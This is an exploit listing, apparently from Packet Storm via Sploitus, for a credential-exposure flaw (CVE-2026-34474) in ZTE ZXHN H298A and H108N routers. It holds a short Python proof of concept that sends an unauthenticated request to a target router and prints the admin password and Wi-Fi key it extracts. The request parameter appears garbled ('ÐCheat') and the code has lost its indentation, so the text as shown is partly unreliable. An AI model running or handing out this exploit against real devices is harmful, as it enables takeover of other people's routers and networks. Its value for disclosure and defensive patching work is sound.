Share
## https://sploitus.com/exploit?id=PACKETSTORM:221647
# Title: ZTE ZXHN H298A 1.1 / H108N 2.6 - Unauthenticated Credential
Exposure (ETHCheat Parameter)
# Date: 2026-05-20
# Author: Mina Nageh Salalma (Monx Research)
# CVE: CVE-2026-34474
# Vendor: ZTE Corporation
# Affected: ZTE ZXHN H298A 1.1, ZXHN H108N 2.6
# Category: Remote / Webapps
# Tested: Lab hardware + firmware extraction
# Description:
# A GET to /getpage.lua?pid=1000ÐCheat=1 returns the live admin password
# (OBJ_USERINFO_IDPassword1), WLAN PSK (WLANPSK_KeyPassphrase1), and ESSID
# in plaintext from unauthenticated requests. A second endpoint exposes
# the device serial number. No session or credentials required.
#
# MITRE: https://www.cve.org/CVERecord?id=CVE-2026-34474
# Full write-up:
https://github.com/minanagehsalalma/cve-2026-34474-zte-h298a-h108n-sensitive-data-exposure
# PoC:
import requests
def check(target):
r = requests.get(f"http://{target}/getpage.lua?pid=1000ÐCheat=1",
timeout=10, verify=False)
import re, html
admin =
re.search(r"id\s*=\s*'OBJ_USERINFO_IDPassword1'\s*value\s*=\s*'([^']+)'",
r.text)
psk =
re.search(r"id\s*=\s*'WLANPSK_KeyPassphrase1'\s*value\s*=\s*'([^']+)'",
r.text)
print(f"[+] Admin: {html.unescape(admin.group(1)) if admin else '?'} |
PSK: {html.unescape(psk.group(1)) if psk else '?'}")
if __name__ == "__main__":
import sys
check(sys.argv[1])